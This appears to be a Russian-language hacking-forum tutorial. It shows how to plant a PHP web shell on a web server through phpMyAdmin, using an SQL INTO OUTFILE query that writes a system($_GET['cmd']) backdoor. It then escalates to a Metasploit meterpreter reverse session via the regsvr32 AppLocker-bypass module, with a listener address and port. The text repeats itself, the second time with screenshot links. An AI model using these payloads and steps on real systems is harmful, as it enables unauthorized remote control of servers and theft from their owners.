G
Gidroponika
Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP, о нем я уже писал в этой .
Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.
Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь:
>
Заходим в панель управления phpmyadmin и создаем новую базу данных:
Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.
> SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:
Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.
> 127.0.0.1/backdoor.php?cmd=systeminfo
Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.
Запускаем Msfconsole и используем следующий эксплоит:
> use exploit/windows/misc/regsvr32_applocker_bypass_server
> set lhost 172.16.0.192
> set lport 4444
> exploit
Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=
> 127.0.0.1/backdoor.php?cmd=выделенный текст
Как результат, получаем активную сессию meterpreter:
Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.
![24191358b05c904442320.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2F24191358b05c904442320.png&hash=f7285cf1a406f26152fe158526873986)
Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь:
>
Заходим в панель управления phpmyadmin и создаем новую базу данных:
![2f1ebf809e4d30398bdbe.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2F2f1ebf809e4d30398bdbe.png&hash=67c697e99c75b9b63f13931e785b83e9)
Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.
> SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
![4c6cd1a9af4044cf44684.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2F4c6cd1a9af4044cf44684.png&hash=b347f674c1389dc5a598c843b70cd57b)
Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:
![12ec0546d9aa8a4c709b0.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2F12ec0546d9aa8a4c709b0.png&hash=e96293cc1b062ba42e94635a875f9de0)
Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.
> 127.0.0.1/backdoor.php?cmd=systeminfo
![525d41383462a6c12e646.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2F525d41383462a6c12e646.png&hash=8c4bdc9ea0b9eb0ea3cc657785b7303b)
Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.
Запускаем Msfconsole и используем следующий эксплоит:
> use exploit/windows/misc/regsvr32_applocker_bypass_server
> set lhost 172.16.0.192
> set lport 4444
> exploit
![488a227767b5590b66f21.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2F488a227767b5590b66f21.png&hash=a09be683a87c57125231ab07238b939b)
Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=
> 127.0.0.1/backdoor.php?cmd=выделенный текст
![5f60d748c58dff216e480.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2F5f60d748c58dff216e480.png&hash=96f4aa07a754408263d3cec6482aa551)
Как результат, получаем активную сессию meterpreter:
![ab8ac1d271264c04bb8f0.png](/proxy.php?image=http%3A%2F%2Ftelegra.ph%2Ffile%2Fab8ac1d271264c04bb8f0.png&hash=7aaea176c82664280f37a45694fb2d8e)